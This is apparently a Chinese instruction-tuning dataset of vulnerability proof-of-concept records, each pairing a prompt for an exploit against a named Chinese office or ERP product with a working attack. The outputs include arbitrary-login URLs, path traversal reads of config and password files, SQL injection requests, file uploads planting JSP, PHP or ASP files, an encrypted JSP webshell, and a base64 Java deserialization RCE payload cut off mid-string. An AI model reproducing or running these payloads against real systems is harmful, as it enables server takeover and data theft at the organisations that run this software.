  945. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:泛微OA E-Cology ofsLogin.jsp 前台任意用户登录漏洞\n漏洞描述:泛微 e-cology 前台任意用户登录漏洞:泛微 e-cology9 部分版本中存在前台任意用户登录漏洞。该漏洞允许未经身份验证的攻击者通过发送构造的请求触发漏洞,成功利用此漏洞的攻击者可登录任意用户。\n影响版本:``` 部分 e-cology9 且补丁版本 < 10.57 ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. 部分 e-cology9 且补丁版本 < 10.57\n2. /mobile/plugin/1/ofsLogin.jsp?syscode=syscode&timestamp=2&gopage=3&receiver=test&loginTokenFromThird=\n3. /mobile/plugin/1/ofsLogin.jsp?gopage=/wui/index.html&loginTokenFromThird=866fb3887a60239fc112354ee7ffc168&receiver=1&syscode=1&timestamp\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/泛微OA E-Cology ofsLogin.jsp 前台任意用户登录漏洞.md"}
    946. 

  946. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:用友 NC NCFindWeb 任意文件读取漏洞\n漏洞描述:用友NC存在任意文件读取漏洞,攻击者通过漏洞可读取服务器敏感文件\n影响版本:``` 用友NC ```\n网络测绘:``` icon_hash=\"1085941792\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. icon_hash=\"1085941792\"\n2. 验证POC **/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml**\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/用友 NC NCFindWeb 任意文件读取漏洞.md"}
    947. 

  947. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:用友时空 KSOA V9.0 文件上传漏洞\n漏洞描述:用友时空 KSOA 是用友网络科技股份有限公司建立在 SOA 理念指导下研发的新一代产品,其中 com.sksoft.bill.ImageUpload 存在前台文件上传漏洞,攻击者可以在不登陆的情况下上传恶意 Webshell,控制系统权限。\n网络测绘:``` app=\"用友-时空KSOA\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"用友-时空KSOA\"\n2. /servlet/com.sksoft.bill.ImageUpload?filepath=/&filename=\n3. POST /servlet/com.sksoft.bill.ImageUpload?filepath=/&filename=1.jsp HTTP/1.1\nHost: your-ip\nPragma: no-cache\nCache-Control: no-cache\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nReferer: https://en.fofa.info/\nAccept-Encoding: gzip, deflate\nAccept-Language: en,zh-CN;q=0.9,zh;q=0.8\nCookie: JSESSIONID=825A011F31259CCA1649D5DF4849635E\nConnection: close\nContent-Length: 1\n\n<%!\nyour-payload\n%>\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/用友时空 KSOA V9.0 文件上传漏洞.md"}
    948. 

  948. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:致远OA webmail.do 任意文件下载 CNVD-2020-62422\n漏洞描述:致远OA存在任意文件下载漏洞,攻击者可利用该漏洞下载任意文件,获取敏感信息\n影响版本:``` 致远OA A6-V5 致远OA A8-V5 致远OA G6 ```\n网络测绘:``` app=\"致远互联-OA\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. 致远OA A6-V5\n致远OA A8-V5\n致远OA G6\n2. app=\"致远互联-OA\"\n3. /seeyon/webmail.do?method=doDownloadAtt&filename=test.txt&filePath=../conf/datasourceCtp.properties\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/致远OA webmail.do 任意文件下载 CNVD-2020-62422.md"}
    949. 

  949. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:金和OA C6 OpenFile.aspx 后台越权敏感文件遍历漏洞\n漏洞描述:金和OA C6 存在后台越权敏感文件遍历漏洞,普通用户通过遍历特殊参数可以获取其他用户上传的敏感文件\n影响版本:``` 金和OA C6 ```\n网络测绘:``` app=\"Jinher-OA\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"Jinher-OA\"\n2. var strFilePath = '../Resource/slaves/1/8b473ecb-7b39-4384-ada2-b0ec72c4f6ed.png';\nvar strFileType = 'png';\nvar strSid='3jvpvhs410m2wdbbficax5q5';\nvar strFileIDCode='us9w7xWE7do=';\nvar strId = '1229';\nvar strTxtReg = 'txt,ini,xml,config,htm,html,js,css,asp,aspx,jsp,cs,sql,inf,htc,log';\nvar strImgReg = 'jpg,gif,jpeg,png,ico';\nvar MD = '';\n3. http://xxx.xxx.xxx.xxx/C6/control/OpenFile.aspx?id=1200&name=&type=pdf\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/金和OA C6 OpenFile.aspx 后台越权敏感文件遍历漏洞.md"}
    950. 

  950. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:帆软报表 2012 信息泄露漏洞\n漏洞描述:帆软报表 2012 存在信息泄露漏洞,通过访问特定的Url获取部分敏感信息\n影响版本:``` 帆软报表 2012 ```\n网络测绘:``` body=\"down.download?FM_SYS_ID\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. body=\"down.download?FM_SYS_ID\"\n2. http://xxx.xxx.xxx.xxx/ReportServer?op=fr_server&cmd=sc_visitstatehtml&showtoolbar=false\n3. http://xxx.xxx.xxx.xxx/ReportServer?op=fr_server&cmd=sc_getconnectioninfo\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/帆软报表 2012 信息泄露漏洞.md"}
    951. 

  951. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:泛微OA E-Office officeserver.php 任意文件读取漏洞\n漏洞描述:泛微OA E-Office officeserver.php文件存在任意文件读取漏洞,攻击者通过漏洞可以下载服务器上的任意文件\n影响版本:``` 泛微OA E-Office ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. 泛微OA E-Office\n2. app=\"泛微-EOffice\"\n3. /iweboffice/officeserver.php?OPTION=LOADFILE&FILENAME=../mysql_config.ini\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/泛微OA E-Office officeserver.php 任意文件读取漏洞.md"}
    952. 

  952. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:用友 NCCloud FS文件管理SQL注入\n漏洞描述:用友 NCCloud FS文件管理登录页面对用户名参数没有过滤,存在SQL注入 登录页面如下 ![yongyou-6-1](./images/yongyou-6-1.png) 在应用中存在文件服务器管理登录页面 ```plain http://xxx.xxx.xxx.xxx/fs/ ``` ![yongyou6-2](./images/yongyou6-2.png) 登录请求包如下 ```plain GET /fs/console?username=123&password=%2F7Go4Iv2Xqlml0WjkQvrvzX%2FgBopF8XnfWPUk69fZs0%3D HTTP/1.1 Host: xxx.xxx.xxx.xxx Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 Cookie: JSESSIONID=2CF7A25EE7F77A064A9DA55456B6994D.server; JSESSIONID=0F83D6A0F3D65B8CD4C26DFEE4FCBC3C.server Connection: close ``` 使用Sqlmap对**username参数** 进行SQL注入 ```plain sqlmap -r sql.txt -p username ``` ![yongyou-6-3](./images/yongyou-6-3.png)\n影响版本:``` 用友 NCCloud ```\n网络测绘:``` \"NCCloud\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. http://xxx.xxx.xxx.xxx/fs/\n2. GET /fs/console?username=123&password=%2F7Go4Iv2Xqlml0WjkQvrvzX%2FgBopF8XnfWPUk69fZs0%3D HTTP/1.1\nHost: xxx.xxx.xxx.xxx\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6\nCookie: JSESSIONID=2CF7A25EE7F77A064A9DA55456B6994D.server; JSESSIONID=0F83D6A0F3D65B8CD4C26DFEE4FCBC3C.server\nConnection: close\n3. sqlmap -r sql.txt -p username\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/用友 NCCloud FS文件管理SQL注入.md"}
    953. 

  953. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:华天动力OA 8000版 workFlowService SQL注入漏洞\n漏洞描述:华天动力OA 8000版 workFlowService接口存在SQL注入漏洞,攻击者通过漏洞可获取数据库敏感信息\n影响版本:``` 华天动力OA 8000版 ```\n网络测绘:``` app=\"华天动力-OA8000\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. 华天动力OA 8000版\n2. app=\"华天动力-OA8000\"\n3. POST /OAapp/bfapp/buffalo/workFlowService HTTP/1.1\nHost: 、\nAccept-Encoding: identity\nContent-Length: 103\nAccept-Language: zh-CN,zh;q=0.8\nAccept: */*\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\nAccept-Charset: GBK,utf-8;q=0.7,*;q=0.3\nConnection: keep-alive\nReferer: http://www.baidu.com\nCache-Control: max-age=0\n\n<buffalo-call> \n<method>getDataListForTree</method> \n<string>select user()</string> \n</buffalo-call>\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/华天动力OA 8000版 workFlowService SQL注入漏洞.md"}
    954. 

  954. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:致远OA ajax.do 任意文件上传 CNVD-2021-01627\n漏洞描述:致远OA是一套办公协同管理软件。近日,奇安信CERT监测到致远OA的相关漏洞信息。由于致远OA旧版本某些接口存在未授权访问,以及部分函数存在过滤不足,攻击者通过构造恶意请求,可在无需登录的情况下上传恶意脚本文件,从而控制服务器。致远OA官方已针对该漏洞提供补丁。鉴于漏洞危害较大,建议用户尽快应用补丁更新。\n影响版本:``` 致远OA V8.0 致远OA V7.1、V7.1SP1 致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3 致远OA V6.0、V6.1SP1、V6.1SP2 致远OA V5.x 致远OA G6 ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. 致远OA V8.0\n致远OA V7.1、V7.1SP1\n致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3\n致远OA V6.0、V6.1SP1、V6.1SP2\n致远OA V5.x\n致远OA G6\n2. /seeyon/thirdpartyController.do.css/..;/ajax.do\n3. 出现异常:java.lang.NullPointerException:null\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/致远OA ajax.do 任意文件上传 CNVD-2021-01627.md"}
    955. 

  955. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:信呼OA beifenAction.php 后台目录遍历漏洞\n漏洞描述:信呼OA beifenAction.php文件中调用了 getfilerows方法,导致了目录遍历漏洞,攻击者通过漏洞可以获取服务器上的文件信息\n影响版本:``` 信呼OA <= 2.3.2 ```\n网络测绘:``` app=\"信呼协同办公系统\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. 信呼OA <= 2.3.2\n2. app=\"信呼协同办公系统\"\n3. POST /index.php?a=getdatssss&m=beifen&d=system&ajaxbool=true\n\nfolder=../../\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/信呼OA beifenAction.php 后台目录遍历漏洞.md"}
    956. 

  956. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:帆软报表 V9 任意文件覆盖文件上传\n漏洞描述:帆软 V9 存在任意文件覆盖,导致攻击者可以任意文件上传\n影响版本:``` 帆软 V9 ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp  HTTP/1.1\nHost: 192.168.10.1\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nCookie: JSESSIONID=DE7874FC92F0852C84D38935247D947F; JSESSIONID=A240C26B17628D871BB74B7601482FDE\nConnection: close\nContent-Type:text/xml;charset=UTF-8\n\nContent-Length: 74\n\n{\"__CONTENT__\":\"<%out.println(\\\"Hello World!\\\");%>\",\"__CHARSET__\":\"UTF-8\"}\n2. Host: 192.168.10.1\n3. POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp  HTTP/1.1\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/帆软报表 V9 任意文件覆盖文件上传.md"}
    957. 

  957. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:致远OA getSessionList.jsp Session泄漏漏洞\n漏洞描述:通过使用存在漏洞的请求时,会回显部分用户的Session值,导致出现任意登录的情况\n影响版本:未知\n网络测绘:``` app=\"致远互联-OA\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"致远互联-OA\"\n2. <%@ page contentType=\"text/html;charset=GBK\"%>\n<%@ page session= \"false\" %>\n<%@ page import=\"net.btdz.oa.ext.https.*\"%>\n<%\n    String reqType = request.getParameter(\"cmd\");\n    String outXML = \"\";\n    boolean allowHttps = true;\n    if(\"allowHttps\".equalsIgnoreCase(reqType)){\n        //add code to judge whether it allow https or not\n        allowHttps = FetchSessionList.checkHttps();\n        if (allowHttps) response.setHeader(\"AllowHttps\",\"1\");\n    }\n    if(\"getAll\".equalsIgnoreCase(reqType)){\n        outXML = FetchSessionList.getXMLAll();\n    }\n    else if(\"getSingle\".equalsIgnoreCase(reqType)){\n        String sessionId = request.getParameter(\"ssid\");\n        if(sessionId != null){\n            outXML = FetchSessionList.getXMLBySessionId(sessionId);\n        }\n    }\n    else{\n        outXML += \"<?xml version=\\\"1.0\\\" encoding=\\\"GB2312\\\"?>\\r\\n\";\n        outXML += \"<SessionList>\\r\\n\";\n//        outXML += \"<Session>\\r\\n\";\n//        outXML += \"</Session>\\r\\n\";\n        outXML += \"</SessionList>\\r\\n\";\n    }\n    out.println(outXML);\n%>\n3. /yyoa/ext/https/getSessionList.jsp?cmd=getAll\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/致远OA getSessionList.jsp Session泄漏漏洞.md"}
    958. 

  958. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:万户OA smartUpload.jsp 任意文件上传漏洞\n漏洞描述:万户OA smartUpload.jsp文件存在文件上传接口,且没有对文件类型进行过滤,导致任意文件上传漏洞\n影响版本:``` 万户OA ```\n网络测绘:``` app=\"万户网络-ezOFFICE\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"万户网络-ezOFFICE\"\n2. /defaultroot/extension/smartUpload.jsp?path=information&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&\n3. POST /defaultroot/extension/smartUpload.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jsp,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0 HTTP/1.1\nHost: \nContent-Length: 938\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarynNQ8hoU56tfSwBVU\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6\nCookie: JSESSIONID=PjXnh6bLTzy0ygQf41vWctGPLGkSvkJ6J1yS3ppzJmCvVFQZgm1r!1156443419\nConnection: close\n\n------WebKitFormBoundarynNQ8hoU56tfSwBVU\nContent-Disposition: form-data; name=\"photo\"; filename=\"shell.jsp\"\nContent-Type: application/octet-stream\n\n<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals(\"POST\")){String k=\"e45e329feb5d925b\";session.putValue(\"u\",k);Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec(k.getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>\n------WebKitFormBoundarynNQ8hoU56tfSwBVU\nContent-Disposition: form-data; name=\"continueUpload\"\n\n1\n------WebKitFormBoundarynNQ8hoU56tfSwBVU\nContent-Disposition: form-data; name=\"submit\"\n\n上传继续\n------WebKitFormBoundarynNQ8hoU56tfSwBVU--\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/万户OA smartUpload.jsp 任意文件上传漏洞.md"}
    959. 

  959. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:通达OA v2017 action_upload.php 任意文件上传漏洞\n漏洞描述:通达OA v2017 action_upload.php 文件过滤不足且无需后台权限,导致任意文件上传漏洞\n影响版本:``` 通达OA v2017 ```\n网络测绘:``` app=\"TDXK-通达OA\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"TDXK-通达OA\"\n2. POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1\nHost: \nUser-Agent: Go-http-client/1.1\nContent-Length: 893\nContent-Type: multipart/form-data; boundary=---------------------------55719851240137822763221368724\nX_requested_with: XMLHttpRequest\nAccept-Encoding: gzip\n\n-----------------------------55719851240137822763221368724\nContent-Disposition: form-data; name=\"CONFIG[fileFieldName]\"\n\nffff\n-----------------------------55719851240137822763221368724\nContent-Disposition: form-data; name=\"CONFIG[fileMaxSize]\"\n\n1000000000\n-----------------------------55719851240137822763221368724\nContent-Disposition: form-data; name=\"CONFIG[filePathFormat]\"\n\ntcmd\n-----------------------------55719851240137822763221368724\nContent-Disposition: form-data; name=\"CONFIG[fileAllowFiles][]\"\n\n.php\n-----------------------------55719851240137822763221368724\nContent-Disposition: form-data; name=\"ffff\"; filename=\"test.php\"\nContent-Type: application/octet-stream\n\n<?php phpinfo();?>\n-----------------------------55719851240137822763221368724\nContent-Disposition: form-data; name=\"mufile\"\n\nsubmit\n-----------------------------55719851240137822763221368724--\n3. User-Agent: Go-http-client/1.1\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/通达OA v2017 action_upload.php 任意文件上传漏洞.md"}
    960. 

  960. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:O2OA open 后台任意文件读取漏洞\n漏洞描述:O2OA是一款开源免费的企业及团队办公平台,提供门户管理、流程管理、信息管理、数据管理四大平台,集工作汇报、项目协作、移动OA、文档分享、流程审批、数据协作等众多功能,满足企业各类管理和协作需求。 O2OA系统 open 接口存在任意文件读取漏洞。攻击者可利用漏洞读取任意文件。\n影响版本:``` O2OA ```\n网络测绘:``` title==\"O2OA\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. title==\"O2OA\"\n2. POST /x_program_center/jaxrs/config/open?v=6.3\nAuthorization: PfyuxmzgIzq74NYhOcQ5NGbegmqb8H4y50QnO7mEHhA\n\n{\"fileName\":\"../../../etc/passwd\"}\n3. POST /x_program_center/jaxrs/config/open?v=6.3\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/O2OA open 后台任意文件读取漏洞.md"}
    961. 

  961. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:蓝凌EIS 智慧协同平台 api.aspx 任意文件上传漏洞\n漏洞描述:蓝凌EIS 智慧协同平台 api.aspx 文件存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件\n影响版本:蓝凌EIS 智慧协同平台\n网络测绘:``` icon_hash=\"953405444\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. icon_hash=\"953405444\"\n2. POST /eis/service/api.aspx?action=saveImg HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0\nContent-Length: 219\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nConnection: close\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarynUqjgvhmkL1dxpCV\nUpgrade-Insecure-Requests: 1\n\n------WebKitFormBoundarynUqjgvhmkL1dxpCV\nContent-Disposition: form-data; name=\"file\"filename=\"test.asp\"\nContent-Type: text/html\n\n<% response.write(\"Test\")%>\n------WebKitFormBoundarynUqjgvhmkL1dxpCV--\n3. /files/editor_img/xxx/xxx.asp\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/蓝凌EIS 智慧协同平台 api.aspx 任意文件上传漏洞.md"}
    962. 

  962. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:用友 U8 cloud upload.jsp 任意文件上传漏洞\n漏洞描述:用友 U8 cloud upload.jsp 文件存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限\n影响版本:用友 U8 cloud\n网络测绘:``` \"开启U8 cloud云端之旅\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. \"开启U8 cloud云端之旅\"\n2. POST /linux/pages/upload.jsp HTTP/1.1\nHost: \nContent-Type: application/x-www-form-urlencoded\nfilename: Test.jsp\nAccept-Encoding: gzip\n\n<% out.println(\"Test\");%>\n3. /linux/Test.jsp\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/用友 U8 cloud upload.jsp 任意文件上传漏洞.md"}
    963. 

  963. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:金蝶OA 云星空 CommonFileServer 任意文件读取漏洞\n漏洞描述:金蝶OA 云星空 CommonFileServer接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的敏感文件,进一步攻击服务器\n影响版本:金蝶OA 云星空\n网络测绘:``` app=\"金蝶云星空-管理中心\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"金蝶云星空-管理中心\"\n2. /CommonFileServer/c%3a%2fwindows%2fwin.ini\n/CommonFileServer/C%3A%5CProgram%20Files%20%28x86%29%5CKingdee%5CK3Cloud%5CWebSite%5CWeb.config\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/金蝶OA 云星空 CommonFileServer 任意文件读取漏洞.md"}
    964. 

  964. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:致远OA M1Server userTokenService 远程命令执行漏洞\n漏洞描述:致远OA M1Server userTokenService 接口存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限\n影响版本:致远OA M1Server\n网络测绘:``` \"M1-Server 已启动\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. \"M1-Server 已启动\"\n2. POST /esn_mobile_pns/service/userTokenService HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15\nContent-Length: 804\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\nConnection: close\ncmd: @@@@@echo Test\n\n{{base64dec(rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2Zvb3NyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABHNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQB+AAN4cHZyACBqYXZheC5zY3JpcHQuU2NyaXB0RW5naW5lTWFuYWdlcgAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAHQAC25ld0luc3RhbmNldXIAEltMamF2YS5sYW5nLkNsYXNzO6sW167LzVqZAgAAeHAAAAAAc3EAfgATdXEAfgAYAAAAAXQAAmpzdAAPZ2V0RW5naW5lQnlOYW1ldXEAfgAbAAAAAXZyABBqYXZhLmxhbmcuU3RyaW5noPCkOHo7s0ICAAB4cHNxAH4AE3VxAH4AGAAAAAF0LWx0cnkgewogIGxvYWQoIm5hc2hvcm46bW96aWxsYV9jb21wYXQuanMiKTsKfSBjYXRjaCAoZSkge30KZnVuY3Rpb24gZ2V0VW5zYWZlKCl7CiAgdmFyIHRoZVVuc2FmZU1ldGhvZCA9IGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJzdW4ubWlzYy5VbnNhZmUiKS5nZXREZWNsYXJlZEZpZWxkKCd0aGVVbnNhZmUnKTsKICB0aGVVbnNhZmVNZXRob2Quc2V0QWNjZXNzaWJsZSh0cnVlKTsgCiAgcmV0dXJuIHRoZVVuc2FmZU1ldGhvZC5nZXQobnVsbCk7Cn0KZnVuY3Rpb24gcmVtb3ZlQ2xhc3NDYWNoZShjbGF6eil7CiAgdmFyIHVuc2FmZSA9IGdldFVuc2FmZSgpOwogIHZhciBjbGF6ekFub255bW91c0NsYXNzID0gdW5zYWZlLmRlZmluZUFub255bW91c0NsYXNzKGNsYXp6LGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJqYXZhLmxhbmcuQ2xhc3MiKS5nZXRSZXNvdXJjZUFzU3RyZWFtKCJDbGFzcy5jbGFzcyIpLnJlYWRBbGxC